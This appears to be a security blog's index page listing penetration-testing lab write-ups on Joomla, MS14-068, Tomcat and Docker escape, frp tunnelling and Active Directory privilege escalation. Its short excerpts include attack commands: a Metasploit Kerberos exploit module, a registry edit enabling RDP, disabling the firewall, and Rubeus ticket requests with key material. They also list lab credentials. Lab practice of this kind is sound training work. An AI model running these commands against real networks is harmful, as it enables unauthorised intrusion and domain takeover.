zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
红日靶场3.1 Joomla密码更改-白鸢的笔记

红日靶场3.1 Joomla密码更改

环境web  外网服务器web2win2008pcwin2012 DC 信息收集发现80端口用JoomlaJoomscanjoomscan -u http://192.168.0.107[+] Detecting Joomla Version [++] Joomla 3.9.12 [+] admin finder [++]...
3小时前
0306
红日靶场4.3 MS14-068(CVE-2014-6324)域控提权利用-白鸢的笔记

红日靶场4.3 MS14-068(CVE-2014-6324)域控提权利用

参考资料:https://www.cnblogs.com/feizianquan/p/11760564.html 漏洞验证查看SID whoami /usermsfconsole -q search MS14-068 use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set...
10小时前
04114
红日靶场4.2 隧道建立 msf正向shell与全局代理 机器脱域处理-白鸢的笔记

红日靶场4.2 隧道建立 msf正向shell与全局代理 机器脱域处理

隧道建立使用frp建立隧道https://github.com/fatedier/frp/releases?page=3 编辑frpc.ini[common] server_addr = 192.168.157.129 server_port = 7000 [socks_proxy] type = tcp plugin=socks5...
12小时前
0295
红日靶场4.1 Tomcat 8.5.19漏洞与docker逃逸-白鸢的笔记

红日靶场4.1 Tomcat 8.5.19漏洞与docker逃逸

环境说明机器密码ubuntu:ubuntu域成员机器douser:Dotest123DC:administrator:Test2008 ubuntu为入口机器在该机器上执行ubuntu@ubuntu:~$ sudo docker start ec814f6ee002 ec814f6ee002 ubuntu@...
昨天
02410
红日靶场2-白鸢的笔记

红日靶场2

实验环境内网网段:10.10.10.1/24DMZ网段:192.168.111.1/24配置信息DCOS:Windows 2012(64)IP:10.10.10.10应用:AD域WEBOS:Windows 2008(64)IP1:10.10.10.80IP2:192.168.111.80PCOS:Windo...
前天
0457
红日靶场1.2 横向突破DC-白鸢的笔记

红日靶场1.2 横向突破DC

前期准备发现我是administrator上传mimikatz.exe 允许RDPreg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v 'fDenyTSConnections' /t REG_DWORD /d 0 /f 关闭防火墙netsh ...
昨天
03310
红日靶场1.1 mysql拿到reverseshell-白鸢的笔记

红日靶场1.1 mysql拿到reverseshell

实验环境1. 信息收集由于我当时没注意到是win7是入口机器 所以先扫描windows server 2003nmap -T5 -A -p- -n -vvv -noscript 192.168.52.141先从ftp开始发现可以匿名登录 但是里面是空的简单爆...
3天前
03514
Mango NoSql注入与爆破 jjs权限提升-白鸢的笔记

Mango NoSql注入与爆破 jjs权限提升

实验环境攻击者 Kali 10.10.16.5受害者 IP 10.10.10.162 Linux 1. 信息收集22,80,443端口开启root@kali# nmap -p 22,80,443 -sC -sV -oA scans/nmap-tcpscripts 10.10.10.162 Starting Nmap 7....
9个月前
0606
Objective 20-白鸢的笔记

Objective 20

任务• 利用 dollarcorp.moneycorp.local 上的 DA 权限,获取对 eurocorp.local 林的 DC 上的 SharedwithDCorp 共享的访问权限。 C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:63662...
9个月前
06212
Objective 19-白鸢的笔记

Objective 19

任务• 使用 DA 访问 dollarcorp.moneycorp.local,使用 dollarcorp 的 krbtgt 哈希将权限提升至企业管理员或 DA 至父域 moneycorp.local。 >C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rub...
9个月前
08614